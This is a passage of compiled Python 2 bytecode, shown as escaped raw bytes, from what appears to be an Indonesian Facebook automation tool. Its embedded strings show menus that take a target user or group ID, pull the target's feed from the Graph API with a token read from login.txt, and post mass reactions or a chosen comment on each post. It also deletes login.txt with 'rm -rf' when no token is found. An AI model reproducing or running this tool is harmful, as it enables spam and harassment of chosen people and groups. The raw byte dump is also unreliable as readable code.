\x1b[1;97mHahas,\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5. \x1b[1;97mSadBoys+\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m6. \x1b[1;97mAngrys*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\x0b\x00\x00\x00react_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x12\x01\x00\x00L\x07\x00\x00s&\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xf5\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xca\x00|\x00\x00d\x04\x00k\x02\x00rC\x00d\x05\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n\xae\x00|\x00\x00d\x06\x00k\x02\x00r_\x00d\x07\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n\x92\x00|\x00\x00d\x08\x00k\x02\x00r{\x00d\t\x00a\x02\x00t\x03\x00\x83\x00\x00\x01nv\x00|\x00\x00d\n\x00k\x02\x00r\x97\x00d\x0b\x00a\x02\x00t\x03\x00\x83\x00\x00\x01nZ\x00|\x00\x00d\x0c\x00k\x02\x00r\xb3\x00d\r\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n>\x00|\x00\x00d\x0e\x00k\x02\x00r\xcf\x00d\x0f\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x10\x00k\x02\x00r\xe5\x00t\x04\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x11\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00t\x04\x00\x00\x00LIKER9\x00\x00\x00t\x04\x00\x00\x00LOVERs\x00\x00\x00t\x03\x00\x00\x00WOWRt\x00\x00\x00t\x04\x00\x00\x00HAHAR\x81\x00\x00\x00t\x03\x00\x00\x00SADR\x82\x00\x00\x00t\x05\x00\x00\x00ANGRYR:\x00\x00\x00(\x05\x00\x00\x00R/\x00\x00\x00R\x1a\x01\x00\x00t\x04\x00\x00\x00tipet\x05\x00\x00\x00reactR\x11\x01\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00aksi(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x1a\x01\x00\x00a\x07\x00\x00s4\x00\x00\x00\x00\x02\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa5\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00t\t\x00d\x08\x00\x83\x01\x00}\x02\x00y\xed\x00t\n\x00j\x0b\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x02\x00\x17d\x0b\x00\x17|\x00\x00\x17\x83\x01\x00}\x03\x00t\x0c\x00j\r\x00|\x03\x00j\x0e\x00\x83\x01\x00}\x04\x00t\x0f\x00d\x0c\x00\x83\x01\x00\x01d\r\x00d\x0e\x00\x14GHxo\x00|\x04\x00d\x0f\x00\x19d\x10\x00\x19D]_\x00}\x05\x00|\x05\x00d\x11\x00\x19}\x06\x00t\x10\x00j\x11\x00|\x06\x00\x83\x01\x00\x01t\n\x00j\x12\x00d\t\x00|\x06\x00\x17d\x12\x00\x17t\x13\x00\x17d\x13\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x14\x00|\x06\x00d\x15\x00 j\x14\x00d\x16\x00d\x17\x00\x83\x02\x00\x17d\x18\x00\x17t\x13\x00\x17GHq\xe4\x00Wd\r\x00d\x0e\x00\x14GHd\x19\x00t\x15\x00t\x16\x00t\x10\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x1a\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01Wn\'\x00\x04t\x18\x00k\n\x00r\xa0\x01\x01\x01\x01d\x1b\x00GHt\t\x00d\x1a\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1c\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID Target \x1b[1;91m:\x1b[1;97m s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s\x1b\x00\x00\x00https://graph.facebook.com/s\x13\x00\x00\x00?fields=feed.limit(s\x0f\x00\x00\x00)&access_token=s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90t\x04\x00\x00\x00feedRl\x00\x00\x00Rj\x00\x00\x00s\x10\x00\x00\x00/reactions?type=s\x0e\x00\x00\x00&access_token=s\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97mi\n\x00\x00\x00s\x01\x00\x00\x00\nt\x01\x00\x00\x00 s\x14\x00\x00\x00... \x1b[1;92m] \x1b[1;97ms\x1f\x00\x00\x00\r\x1b[1;91m[+]\x1b[1;92m Done \x1b[1;97ms\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x17\x00\x00\x00\x1b[1;91m[!] ID not found(\x19\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00t\x06\x00\x00\x00reaksiR\x94\x00\x00\x00Rh\x00\x00\x00R!\x01\x00\x00R\x16\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x11\x01\x00\x00R,\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00idet\x05\x00\x00\x00limitt\x02\x00\x00\x00oht\x02\x00\x00\x00ahRm\x00\x00\x00Ro\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R"\x01\x00\x00\x7f\x07\x00\x00s<\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x03\x01#\x01\x12\x01\n\x01\t\x01\x15\x01\n\x01\r\x01!\x01%\x01\t\x01\x15\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa5\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x0f\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1. \x1b[1;97mLikes*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2. \x1b[1;97mLoves)\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3. \x1b[1;97mWows*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4. \x1b[1;97mHahas,\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5. \x1b[1;97mSadBoys+\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m6. \x1b[1;97mAngrys*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\x0c\x00\x00\x00reactg_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x13\x01\x00\x00\xa0\x07\x00\x00s&\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xf5\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xca\x00|\x00\x00d\x04\x00k\x02\x00rC\x00d\x05\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n\xae\x00|\x00\x00d\x06\x00k\x02\x00r_\x00d\x07\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n\x92\x00|\x00\x00d\x08\x00k\x02\x00r{\x00d\t\x00a\x02\x00t\x03\x00\x83\x00\x00\x01nv\x00|\x00\x00d\n\x00k\x02\x00r\x97\x00d\x0b\x00a\x02\x00t\x03\x00\x83\x00\x00\x01nZ\x00|\x00\x00d\x0c\x00k\x02\x00r\xb3\x00d\r\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n>\x00|\x00\x00d\x0e\x00k\x02\x00r\xcf\x00d\x0f\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x10\x00k\x02\x00r\xe5\x00t\x04\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x11\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R\x1b\x01\x00\x00R9\x00\x00\x00R\x1c\x01\x00\x00Rs\x00\x00\x00R\x1d\x01\x00\x00Rt\x00\x00\x00R\x1e\x01\x00\x00R\x81\x00\x00\x00R\x1f\x01\x00\x00R\x82\x00\x00\x00R \x01\x00\x00R:\x00\x00\x00(\x05\x00\x00\x00R/\x00\x00\x00R+\x01\x00\x00R!\x01\x00\x00t\x06\x00\x00\x00reactgR\x11\x01\x00\x00(\x01\x00\x00\x00R#\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R+\x01\x00\x00\xb5\x07\x00\x00s4\x00\x00\x00\x00\x02\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\t\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\r\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00t\t\x00d\x08\x00\x83\x01\x00}\x02\x00y>\x00t\n\x00j\x0b\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x03\x00t\x0c\x00j\r\x00|\x03\x00j\x0e\x00\x83\x01\x00}\x04\x00d\x0b\x00|\x04\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x0f\x00k\n\x00r\xf1\x00\x01\x01\x01d\r\x00GHt\t\x00d\x0e\x00\x83\x01\x00\x01t\x10\x00\x83\x00\x00\x01n\x01\x00Xy\xed\x00t\n\x00j\x0b\x00d\x0f\x00|\x01\x00\x17d\x10\x00\x17|\x02\x00\x17d\x11\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0c\x00j\r\x00|\x05\x00j\x0e\x00\x83\x01\x00}\x06\x00t\x11\x00d\x12\x00\x83\x01\x00\x01d\x13\x00d\x14\x00\x14GHxo\x00|\x06\x00d\x15\x00\x19d\x16\x00\x19D]_\x00}\x07\x00|\x07\x00d\x17\x00\x19}\x08\x00t\x12\x00j\x13\x00|\x08\x00\x83\x01\x00\x01t\n\x00j\x14\x00d\x18\x00|\x08\x00\x17d\x19\x00\x17t\x15\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x1a\x00|\x08\x00d\x1b\x00 j\x16\x00d\x1c\x00d\x1d\x00\x83\x02\x00\x17d\x1e\x00\x17t\x15\x00\x17GHqL\x01Wd\x13\x00d\x14\x00\x14GHd\x1f\x00t\x17\x00t\x18\x00t\x12\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x0e\x00\x83\x01\x00\x01t\x19\x00\x83\x00\x00\x01Wn\'\x00\x04t\x0f\x00k\n\x00r\x08\x02\x01\x01\x01d \x00GHt\t\x00d\x0e\x00\x83\x01\x00\x01t\x19\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(!\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID Group \x1b[1;91m:\x1b[1;97m s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s \x00\x00\x00https://graph.facebook.com/v3.0/s\x13\x00\x00\x00?fields=feed.limit(s\x0f\x00\x00\x00)&access_token=s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90R$\x01\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x10\x00\x00\x00/reactions?type=s\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97mi\n\x00\x00\x00s\x01\x00\x00\x00\nR%\x01\x00\x00s\x14\x00\x00\x00... \x1b[1;92m] \x1b[1;97ms\x1f\x00\x00\x00\r\x1b[1;91m[+]\x1b[1;92m Done \x1b[1;97ms\x17\x00\x00\x00\x1b[1;91m[!] ID not found(\x1a\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x13\x01\x00\x00R \x00\x00\x00t\n\x00\x00\x00reaksigrupR\x94\x00\x00\x00Rh\x00\x00\x00R!\x01\x00\x00R\x16\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x11\x01\x00\x00(\t\x00\x00\x00R4\x00\x00\x00R\'\x01\x00\x00R(\x01\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R)\x01\x00\x00R*\x01\x00\x00Rm\x00\x00\x00Ro\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R,\x01\x00\x00\xd3\x07\x00\x00sL\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x03\x01#\x01\x12\x01\n\x01\t\x01\x15\x01\n\x01\r\x01!\x01%\x01\t\x01\x15\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xc4\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHt\t\x00d\x08\x00\x83\x01\x00}\x01\x00t\t\x00d\t\x00\x83\x01\x00}\x02\x00t\t\x00d\n\x00\x83\x01\x00}\x03\x00|\x02\x00j\n\x00d\x0b\x00d\x0c\x00\x83\x02\x00}\x02\x00y\xe9\x00t\x0b\x00j\x0c\x00d\r\x00|\x01\x00\x17d\x0e\x00\x17|\x03\x00\x17d\x0f\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\r\x00j\x0e\x00|\x04\x00j\x0f\x00\x83\x01\x00}\x05\x00t\x10\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHxk\x00|\x05\x00d\x13\x00\x19d\x14\x00\x19D][\x00}\x06\x00|\x06\x00d\x15\x00\x19}\x07\x00t\x11\x00j\x12\x00|\x07\x00\x83\x01\x00\x01t\x0b\x00j\x13\x00d\r\x00|\x07\x00\x17d\x16\x00\x17|\x02\x00\x17d\x17\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x18\x00|\x02\x00d\x19\x00 j\n\x00d\x0c\x00d\x1a\x00\x83\x02\x00\x17d\x1b\x00\x17GHq\x07\x01Wd\x11\x00d\x12\x00\x14GHd\x1c\x00t\x14\x00t\x15\x00t\x11\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01Wn\'\x00\x04t\x17\x00k\n\x00r\xbf\x01\x01\x01\x01d\x1e\x00GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1f\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s6\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m\'<>\' \x1b[1;92mfor new liness,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mComment \x1b[1;91m:\x1b[1;97m s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s\x02\x00\x00\x00<>s\x01\x00\x00\x00\ns\x1b\x00\x00\x00https://graph.facebook.com/s\x13\x00\x00\x00?fields=feed.limit(s\x0f\x00\x00\x00)&access_token=s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90R$\x01\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00s\x12\x00\x00\x00/comments?message=s\x0e\x00\x00\x00&access_token=s\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97mi\n\x00\x00\x00R%\x01\x00\x00s\x0c\x00\x00\x00... \x1b[1;92m]s\x1f\x00\x00\x00\r\x1b[1;91m[+]\x1b[1;92m Done \x1b[1;97ms\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x17\x00\x00\x00\x1b[1;91m[!] ID not found(\x18\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\x16\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00komenR\x94\x00\x00\x00Rh\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x11\x01\x00\x00R,\x00\x00\x00(\x08\x00\x00\x00R4\x00\x00\x00R\'\x01\x00\x00t\x02\x00\x00\x00kmR(\x01\x00\x00R\xf1\x00\x00\x00Rm\x00\x00\x00R\xa2\x00\x00\x00t\x01\x00\x00\x00f(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x14\x01\x00\x00\xfc\x07\x00\x00sB\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\x12\x01\x03\x01#\x01\x12\x01\n\x01\t\x01\x15\x01\n\x01\r\x01!\x01!\x01\t\x01\x15\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\n\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s,\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHt\t\x00d\x08\x00\x83\x01\x00}\x01\x00t\t\x00d\t\x00\x83\x01\x00}\x02\x00t\t\x00d\n\x00\x83\x01\x00}\x03\x00|\x02\x00j\n\x00d\x0b\x00d\x0c\x00\x83\x02\x00}\x02\x00y>\x00t\x0b\x00j\x0c\x00d\r\x00|\x01\x00\x17d\x0e\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\r\x00j\x0e\x00|\x04\x00j\x0f\x00\x83\x01\x00}\x05\x00d\x0f\x00|\x05\x00d\x10\x00\x19\x17GHWn\'\x00\x04t\x10\x00k\n\x00r\x14\x01\x01\x01\x01d\x11\x00GHt\t\x00d\x12\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01n\x01\x00Xy\xe9\x00t\x0b\x00j\x0c\x00d\x13\x00|\x01\x00\x17d\x14\x00\x17|\x03\x00\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x06\x00t\r\x00j\x0e\x00|\x06\x00j\x0f\x00\x83\x01\x00}\x07\x00t\x12\x00d\x16\x00\x83\x01\x00\x01d\x17\x00d\x18\x00\x14GHxk\x00|\x07\x00d\x19\x00\x19d\x1a\x00\x19D][\x00}\x08\x00|\x08\x00d\x1b\x00\x19}\t\x00t\x13\x00j\x14\x00|\t\x00\x83\x01\x00\x01t\x0b\x00j\x15\x00d\x1c\x00|\t\x00\x17d\x1d\x00\x17|\x02\x00\x17d\x0e\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x1e\x00|\x02\x00d\x1f\x00 j\n\x00d\x0c\x00d \x00\x83\x02\x00\x17d!\x00\x17GHqo\x01Wd\x17\x00d\x18\x00\x14GHd"\x00t\x16\x00t\x17\x00t\x13\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x12\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01Wn\'\x00\x04t\x10\x00k\n\x00r\'\x02\x01\x01\x01d#\x00GHt\t\x00d\x12\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S($\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s6\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m\'<>\' \x1b[1;92mfor new liness,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mComment \x1b[1;91m:\x1b[1;97m s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s\x02\x00\x00\x00<>s\x01\x00\x00\x00\ns%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s \x00\x00\x00https://graph.facebook.com/v3.0/s\x13\x00\x00\x00?fields=feed.limit(s\x0f\x00\x00\x00)&access_token=s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90R$\x01\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x12\x00\x00\x00/comments?message=s\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97mi\n\x00\x00\x00R%\x01\x00\x00s\x0c\x00\x00\x00... \x1b[1;92m]s\x1f\x00\x00\x00\r\x1b[1;91m[+]\x1b[1;92m Done \x1b[1;97ms\x10\x00\x00\x00\x1b[1;91m[!] 